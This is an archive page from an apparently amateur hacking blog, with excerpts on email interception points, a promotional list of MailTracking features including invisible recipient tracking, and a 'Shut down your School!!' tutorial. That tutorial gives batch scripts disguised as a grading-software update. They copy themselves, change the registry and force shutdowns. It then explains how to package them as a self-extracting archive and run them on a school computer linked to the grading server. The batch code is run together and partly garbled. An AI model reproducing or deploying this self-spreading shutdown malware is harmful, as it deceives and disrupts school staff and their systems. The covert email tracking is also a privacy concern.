Find


Archive for March, 2008

 

Your Email can be intercepted ! Check How

Mar 22, 2008 in Email Hacking, Security




ii. Internet Service Provider (ISP)

The Internet is composed of numerous different interconnected networks and systems that collectively provide a backbone for the transmission of network traffic. It is a highly dynamic physical environment: a system or network device that is here today may be gone or reconfigured tomorrow, and the underlying protocols of the Internet will automatically detect and accommodate for this change. This dynamic nature is one of the things that make the Internet so powerful. However, given the dynamic nature of the Internet, it is impossible to absolutely predict exactly what path network traffic will follow. One email message that you send could take an entirely different path to reach the recipient than another that you send to the same person. In fact, it is even worse than that: for the sake of efficiency, email messages and other network traffic are typically broken down into smaller little chunks, or packets, before they are sent across the
network, and automatically re-assembled on the other side. Each of these individual packets may in fact follow a different path to get to the recipient! (In actual practice, a given path tends to get reused until the operational parameters of that or other related paths have significantly changed.)

The net result of all this is that your message, or at least little chunks of your message, travels through an indeterminate set of systems and network devices, each of which offers a point of interception. These systems may be owned or operated by corporations and non-profit organizations, by colleges, by governments and government agencies, or by telecom and other connectivity providers. Given such a widely divergent group, it is easy to see how either an unethical organization or a renegade employee may easily gain access to the messages and traffic crossing their systems. All of these factors combine to make the Internet itself the primary source of message interception points.

[Ask] [blinklist] [Connotea] [del.icio.us] [Digg] [Facebook] [Fark] [Faves] [Furl] [Google] [Ma.gnolia] [Mixx] [MySpace] [Netvouz] [Newsvine] [Propeller] [Reddit] [Slashdot] [Sphere] [StumbleUpon] [Technorati] [Windows Live] [Yahoo!] [Email]

Popularity: 76% [?]

-->

Top 10 Places Your Email Can Be Intercepted
i. The Internet
The Internet has radically changed the way we communicate with each other. Email is obviously an extremely valuable and ubiquitous form of communication, but with this technology comes certain pitfalls that should be understood. The path that an email message takes to reach its recipient is […]

Popularity: 76% [?]

⇥ Read the article in full

No Comments »

Tracking Email

Mar 22, 2008 in Email Hacking




email tracking - The Ethical Hacking What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:

  • Date and time opened
  • Location of recipient (per their ISP city /town)
  • Map of location (available on paid subscriptions)
  • Recipients IP address
  • Apparent email address of opening (if available)
  • Referrer details (ie; if accessed via web mail etc)
  • URL clicks
  • How long the email was read for
  • How many times your email was opened
  • If your email was forwarded, or opened on a different computer

All messages sent via MailTracking benefit from the SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: MailTracking.com does not use or contain any spy-ware, mal-ware, nor vi‌rues, it is not illegal to use, and does not breach any privacy regulations in any countries.

What else does MailTracking do?

email tracking - The Ethical HackingThere are lots of great features available to you - these include the following sending options:

  • Certified email
  • Ensured-Receipts and retractable emails
  • Invisible tracking
  • Self-Destructing emails
  • Block printing
  • Block forwarding
  • Adobe Acrobat PDF Document Tracking
  • Secure Encypted emails
  • Track MS Word or Excel documents

email tracking - The Ethical HackingYou can also choose how to receive your receipts:

  • In your Personal Tracking Page (when you log in)
  • Email ReadNotifications
  • Legal Proof-of-Opening receipts
  • Delivery Service Notifications (DSN’s)
  • SMS alert on your cell-phone or pager
  • Instant Messenger

Click Here to Register.

Popularity: 51% [?]

-->

MailTracking.com - What is it and how does it work?
What is MailTracking?
MailTracking is the most powerful and reliable email tracking service that exists today. In short - MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more
How do I send a […]

Popularity: 51% [?]

⇥ Read the article in full

No Comments »

Shut down your School!!

Mar 18, 2008 in Hacking Computer, Hacking at School and College, Windows Hacking




Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

Popularity: 94% [?]

-->

This article is for only educational purpose, i am not responsible for any misuse of this article.

By using the following command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save […]

Popularity: 94% [?]

⇥ Read the article in full

No Comments »

Hungry Hackers Beta

Mar 16, 2008 in Uncategorized

Hi Friends,
I m Really Sorry for not writing a single post for one and half month but I was busy upgrading the website. The Good News is that now we are having our a new Domain Name thats “www.hungry-hackers.com” . Even if you goto the previous domain you will be redirected to this new […]

Popularity: 64% [?]

⇥ Read the article in full

2 Comments »